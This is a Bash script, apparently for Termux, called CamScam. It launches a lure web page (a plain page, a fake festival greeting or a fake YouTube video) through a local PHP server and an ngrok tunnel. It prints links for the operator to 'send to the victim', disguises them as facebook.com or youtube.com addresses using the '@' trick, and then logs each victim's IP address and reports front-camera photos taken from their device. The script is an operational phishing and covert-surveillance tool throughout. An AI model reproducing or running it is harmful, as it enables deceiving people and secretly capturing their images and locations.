#!/bin/bash
g="${b}\033[1;30m"
b="\033[0m"
b1="$b\033[1;37m"
r="${b}\033[1;31m"
r1="${b}\033[31m"
A="${b}\033[1;34m"
A1="${b}\033[34m"
ac="${b}\e[1;36m"
ac1="${b}\e[36m"
v="${b}\033[1;32m"
v1="${b}\033[32m"
m="$b\033[1;35m"
m1="$b\033[35m"
a="$b\033[1;33m"
a1="$b\033[33m"
cy="$b\033[38;2;23;147;209m"
ruta=~/CamScam
azar=$(shuf -i 3000-9999 -n 1)
trap Adios INT
Adios() {
		sleep 0.2
		echo -e "\n${v1}\n[$b1+$v1]$b Finished\n$v1[$b1+$v1]$b Created by Anonymous Zpt\n$v1[$b1+$v1]$b Gracias por usar mi herramienta\n$v1[$b1+$v1]$b servicio de ayuda https://t.me/Anonymous_Zpt$b\n"
		sleep 0.0
if [ -e .localhost ]; then
rm -rf .localhost
fi
if [ -e .VideoYT ]; then
rm -rf .VideoYT
fi
		exit
	}
VERIFICAR_NGROK=$(ps aux | grep -o "ngrok" | head -n1)
VERIFICAR_PHP=$(ps aux | grep -o "php" | head -n1)
if [[ $VERIFICAR_NGROK == *'ngrok'* ]]; then
pkill -f -2 ngrok > /dev/null 2>&1
killall -2 ngrok > /dev/null 2>&1
fi
if [[ $VERIFICAR_PHP == *'php'* ]]; then
pkill -f -2 php > /dev/null 2>&1
killall -2 php > /dev/null 2>&1
fi
banner() {
clear
sleep 0.4
echo -e "$v  _______\n |   _   | .---.-. .--------.\n |.  1___| |  _  | |        |\n |.  |___  |___._| |__|__|__|\n |:  1   |\n |::.. . |\n '-------'\n         _______\n        |   _   | .----. .---.-. .--------.\n        |   1___| |  __| |  _  | |        |\n        |____   | |____| |___._| |__|__|__|\n        |:  1   |\n        |::.. . |\n        '-------'$b"
sleep 0.3
}
test_ngrok() {
if [ ! -e $ruta/ngrok ]; then
sleep 1
echo -e "$v1[$b1+$v1]$b Descargando ngrok..."
case $(ping -c 1 -q www.google.com >&/dev/null; echo $?) in
0)
F=F
;;
*)
echo -e "$r[-]$b1 CamScam:$r No Hay Conexion A Internet.$b"
Adios
exit
esac
case $(command -v ngrok) in
"")
case `dpkg --print-architecture` in
aarch64)
    architectureURL="arm64" ;;
arm)
    architectureURL="arm" ;;
armhf)
    architectureURL="armhf" ;;
aamd64)
    architectureURL="amd64" ;;
i*86)
    architectureURL="i386" ;;
x86_64)
    architectureURL="amd64" ;;
*)
    echo "Proceso Desconocido"
esac
command -v wget > /dev/null 2>&1 || { sleep 0.5; echo >&2 -e "$v1[$b1*$v1]$b Instalando wget..."; pkg install wget -y &>> /dev/null;sleep 0.5;}
if [ -e ngrok.zip ]; then
rm -rf ngrok.zip
fi
wget "https://github.com/tchelospy/NgrokTest/blob/master/ngrok-stable-linux-${architectureURL}.zip?raw=true" -O ngrok.zip
unzip ngrok.zip &>> /dev/null
if [ ! -e ngrok ]; then
echo -e "$r[-]$b1 CamScam:$r Verifica La Conexion A Internet.$b"
exit
fi
cat ngrok > /data/data/com.termux/files/usr/bin/ngrok
chmod 700 /data/data/com.termux/files/usr/bin/ngrok
chmod 700 ngrok
rm -rf ngrok.zip
;;
*)
sleep 9
cp $PREFIX/bin/ngrok $ruta
esac
fi
}
pagina() {
banner
if [ -e .localhost ]; then
rm -rf .localhost
fi
echo -e "$azar" >> .localhost
link=http://localhost:$(cat .localhost)
echo -e "
$v1[${b}01$v1]$b Simple
$v1[${b}02$v1]$b Fetival
$v1[${b}03$v1]$b VideoYT
$v1[${b}00$v1]$b Salir
"
printf "$v1[${b1}+$v1]$b Elige una opcion: "
read pagina
case $pagina in
01|1)
web=$ruta/BOT/Simple
if [ -e $web/Simple ]; then
rm -rf $web/Simple
fi
mkdir $web/Simple
web2=$web/Simple
cp $web/PaginaSimple.html $web2
cp $web/template.php $web2
cp $web/ip.php $web2
cp $web/post.php $web2
;;
02|2)
web=$ruta/BOT/Festival
if [ -e $web/Festival ]; then
rm -rf $web/Festival
fi
mkdir $web/Festival
web2=$web/Festival
cp $web/PaginaFestival.html $web2
cp $web/template.php $web2
cp $web/ip.php $web2
cp $web/post.php $web2
cp $web/ic_comparte.png $web2
cp $web/icon.png $web2
echo
printf "$v1[${b1}+$v1]$b Ingrese el nombre del festival: "
read fest_name
;;
03|3)
web=$ruta/BOT/VideoYT
sleep 0.5
echo
printf "${b}Ejemplo:$v1 https://m.youtube.com/watch?v=wlAA3u8ma9A$b\n"
printf "${b}Ejemplo:$v1 wlAA3u8ma9A$b\n"
printf "$v1[${b1}+$v1]$b Ingrese el ID del video: "
read url_video
if [ $(echo "$url_video" | grep -o "https://m.youtube.com/watch?v=") ]; then
id=$(echo -e "$video" | grep -o "v=[0-9a-z].*" |sed 's/v=//')
video=$url_video
elif [ $(echo "$url_video" | grep -o "https://youtu.be/") ]; then
id=$(echo -e "$url_video" |tr -d "/" |sed 's/https:youtu.be//')
video=https://m.youtube.com/watch?v=$id
elif [ $(echo "$url_video" | grep -o "v=[0-9a-z].*" |sed 's/v=//') ]; then
id=$(echo -e "$video" | grep -o "v=[0-9a-z].*" |sed 's/v=//')
video=https://m.youtube.com/watch?v=$id
elif [ "url_$video" == "" ]; then
id=wlAA3u8ma9A
video=https://m.youtube.com/watch?v=$id
else
id=$url_video
video=https://m.youtube.com/watch?v=$id
fi
if [ -e $web/VideoYT ]; then
rm -rf $web/VideoYT
fi
mkdir $web/VideoYT
web2=$web/VideoYT
cp $web/PaginaVideoYT.html $web2
cp $web/template.php $web2
cp $web/ip.php $web2
cp $web/post.php $web2
cp $web/icon.png $web2
if [ -e .VideoYT ]; then
rm -rf .VideoYT
fi
;;
00)
$Adios
;;
*)
echo -e "${r1}[—] Opcion Invalida..!$b"
sleep 1
pagina
esac
}
pagina
rm -rf $web/ip.txt
rm -rf $web2/ip.txt
sleep 0.5
case $pagina in
03|3)
echo -e "\n$v1[$b1+$v1]$b Abriendo Servidores${r1}[Esto puede tardar]${b}..."
curl -L $video >> .VideoYT
;;
*)
echo -e "\n$v1[$b1+$v1]$b Abriendo Servidores..."
sleep 2
esac
echo -e "$v1[$b1+$v1]$b Abriendo servidor php..."
command -v php > /dev/null 2>&1 || { sleep 2; echo >&2 -e "$v1[$b*$v1]$b Instalando php..."; pkg install php -y &>> /dev/null;sleep 1;}
sleep 2
php -S 127.0.0.1:$(cat .localhost) -t $web2 > /dev/null 2>&1 &
echo -e "$v1[$b1+$v1]$b Abriendo servidor ngrok..."
test_ngrok
php -S 127.0.0.1:3333 -t $web > /dev/null 2>&1 &
./ngrok http 127.0.0.1:3333 > /dev/null 2>&1 &
sleep 5
echo -e "$v1[$b1+$v1]$b Obteniendo URLs.."
sleep 1
echo -e "$v1[$b1+$v1]$b Servicio de ayuda  =$v1 https://t.me/Anonymous_Zpt$b"
sleep 1
echo -e "$v1[$b1+$v1]$b Envia ala victima  =$v1 http://localhost:$(cat .localhost)$b"
sleep 1
if [ "$(curl -s -N http://127.0.0.1:4041/api/tunnels | grep -o 'https://[0-9a-z]*\.ngrok.io')" ]; then
link2=$(curl -s -N http://127.0.0.1:4041/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
echo -e "$v1[$b1+$v1]$b Envia ala victima  =$v1 $link2$b"
namee=$(echo "$link2" | cut -d "/" -f3)
sleep 1
case $pagina in
03|3)
echo -e "$v1[$b1*$v1]$b Envio por facebook =$v1 https://www.youtube.com@$namee"
;;
*)
echo -e "$v1[$b1*$v1]$b Envio por facebook =$v1 https://www.facebook.com@$namee"
esac
fi
if [ "$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o 'https://[0-9a-z]*\.ngrok.io')" ]; then
link2=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
echo -e "$v1[$b1+$v1]$b Envia ala victima  =$v1 $link2$b"
namee=$(echo "$link2" | cut -d "/" -f3)
sleep 1
case $pagina in
03|3)                                                                                   echo -e "$v1[$b1*$v1]$b Envio por facebook =$v1 https://www.youtube.com@$namee"
;;
*)
echo -e "$v1[$b1*$v1]$b Envio por facebook =$v1 https://www.facebook.com@$namee"
esac
fi
case $pagina in
01|1)
sed 's+forwarding_link+'$link2'+g' $web/PaginaSimple.html > $web/index2.html
sed 's+forwarding_link+'$link2'+g' $web/template.php > $web/index.php
sed 's+forwarding_link+'$link'+g' $web2/PaginaSimple.html > $web2/index2.html
sed 's+forwarding_link+'$link'+g' $web2/template.php > $web2/index.php
;;
02|2)
sed 's+forwarding_link+'$link2'+g' $web/PaginaFestival.html > $web/index3.html
sed 's+forwarding_link+'$link2'+g' $web/template.php > $web/index.php
sed 's+forwarding_link+'$link'+g' $web2/PaginaFestival.html > $web2/index3.html
sed 's+forwarding_link+'$link'+g' $web2/template.php > $web2/index.php
if [ "$fest_name" == "" ]; then
sed 's/fes_name/Aniversario/' $web/index3.html > $web/index2.html
sed 's/fes_name/Aniversario/' $web2/index3.html > $web2/index2.html
else
festival_name=$(echo -e "$fest_name" |sed 's/ //')
sed 's+fes_name+'$festival_name'+g' $web/index3.html > $web/index2.html
sed 's+fes_name+'$festival_name'+g' $web2/index3.html > $web2/index2.html
fi
;;
03|3)
sed 's+forwarding_link+'$link2'+g' $web/PaginaVideoYT.html > $web/index3.html 
sed -i '1,3d' $web/index3.html
sed 's+live_yt_tv+'$id'+g' $web/index3.html > $web/index2.html
sed 's+forwarding_link+'$link2'+g' $web/template.php > $web/index.php
sed 's+forwarding_link+'$link'+g' $web2/PaginaVideoYT.html > $web2/index3.html
sed -i '1,3d' $web2/index3.html
sed 's+live_yt_tv+'$id'+g' $web2/index3.html > $web2/index2.html
sed 's+forwarding_link+'$link'+g' $web2/template.php > $web2/index.php
mv $web/index2.html $web/index.html
mv $web2/index2.html $web2/index.html
if [ "$(cat .VideoYT)" == "" ]; then
echo -e "<!doctype html>\n<html>\n<head>" >> $web/index2.html
echo -e "<!doctype html>\n<html>\n<head>" >> $web2/index2.html
echo -e '<title> YouTube </title>' >> $web/index2.html
echo -e '<title> YouTube </title>' >> $web2/index2.html
echo -e "$(cat $web/index.html)" >> $web/index2.html
echo -e "$(cat $web2/index.html)" >> $web2/index2.html
else
echo -e "<!doctype html>\n<html>\n<head>" >> $web/index2.html
echo -e "<!doctype html>\n<html>\n<head>" >> $web2/index2.html
imagen=$(cat .VideoYT |grep -i '<meta property="og:image"')
titulo=$(cat .VideoYT |grep -i '<meta property="og:title"')
descripcion=$(cat .VideoYT |grep -i '<meta property="og:description"')
url=$(cat .VideoYT |grep -i '<meta property="og:url"')
nombre=$(cat .VideoYT |grep -i '<meta itemprop="name"')
imagen1=$(cat .VideoYT |grep -i '<meta property="og:image:width" content="1280">')
imagen2=$(cat .VideoYT |grep -i '<meta property="og:image:height" content="720">')
echo -e ''$nombre >> $web/index2.html
echo -e ''$url >> $web/index2.html
echo -e ''$titulo >> $web/index2.html
echo -e ''$imagen >> $web/index2.html
echo -e ''$imagen1 >> $web/index2.html
echo -e ''$imagen2 >> $web/index2.html
echo -e ''$descripcion >> $web/index2.html
echo -e "$(cat $web/index.html)" >> $web/index2.html
echo -e ''$nombre >> $web2/index2.html
echo -e ''$url >> $web2/index2.html
echo -e ''$titulo >> $web2/index2.html
echo -e ''$imagen >> $web2/index2.html
echo -e ''$imagen1 >> $web2/index2.html
echo -e ''$imagen2 >> $web2/index2.html
echo -e ''$descripcion >> $web2/index2.html
echo -e "$(cat $web2/index.html)" >> $web2/index2.html
fi
if [ -e .VideoYT ]; then
rm -rf .VideoYT
fi
if [ -e .localhost ]; then
rm -rf .localhost
fi
esac
function catch_ip {
ip=$(grep -a 'IP:' $web/ip.txt | cut -d " " -f2 | tr -d '\r')
IFS=$'\n'
printf "$v1[$b1*$v1]$b Ip =$v1 $ip"
}
function catch_ip2 {
ip=$(grep -a 'IP:' $web2/ip.txt | cut -d " " -f2 | tr -d '\r')
IFS=$'\n'
printf "$v1[$b1*$v1]$b Ip =$v1 $ip"
}
start() {
printf "\n"
sleep 0.4
echo -ne "$v1[$b1*$v1]$b Interactuando ala victima..."
while [ true ]; do
if [ -e $web/ip.txt ]; then
echo -e "\n"
echo -ne "$v1[$b1*$v1]$b La victima accedio al enlace...\n"
sleep 0.7
catch_ip
rm -rf $web/ip.txt
fi
if [ -e $web2/ip.txt ]; then
echo -e "\n"
sleep 0.5
echo -ne "$v1[$b1*$v1]$b La victima accedio al enlace...\n"
sleep 0.5
catch_ip2
rm -rf $web2/ip.txt
fi
sleep 0.5
if [ -e $web/Log.log ]; then
echo -ne "\n$v1[$b1*$v1]$b Se tomo una foto en la camara frontal"
rm -rf $web/Log.log
fi
if [ -e $web2/Log.log ]; then
echo -ne "\n$v1[$b1*$v1]$b Se tomo una foto en la camara frontal"
rm -rf $web2/Log.log
fi
sleep 0.5
done
}
start
